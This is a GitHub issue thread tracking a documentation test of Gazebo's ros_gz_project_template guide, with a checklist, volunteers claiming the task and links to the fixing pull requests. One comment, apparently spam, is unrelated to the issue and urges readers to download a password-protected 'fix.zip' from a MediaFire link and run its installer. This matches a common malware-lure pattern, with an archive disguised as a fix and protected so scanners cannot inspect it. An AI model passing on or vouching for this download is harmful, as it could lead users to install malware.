gazebosim/gazebo_test_cases #1077: docs: ros_gz_project_template_guide

azeey-test, 2024-08-29:
## Configuration

* os: Ubuntu Noble

## Links

* [Live](https://gazebosim.org/docs/ionic/ros_gz_project_template_guide)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/ros_gz_project_template_guide.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Mechazo11, 2024-09-02:
Interested

j-rivero, 2024-09-06:
Found this while testing other ROS stuff. It requires changes in different repositories, @Mechazo11 I proceed if you don't mind.

j-rivero, 2024-09-06:
https://github.com/gazebosim/ros_gz_project_template/pull/34

j-rivero, 2024-09-06:
https://github.com/gazebosim/docs/pull/503

Mechazo11, 2024-09-06:
@j-rivero please do, I might not have been able to do this one over the weekend anyways.

closed 2025-08-27 by azeey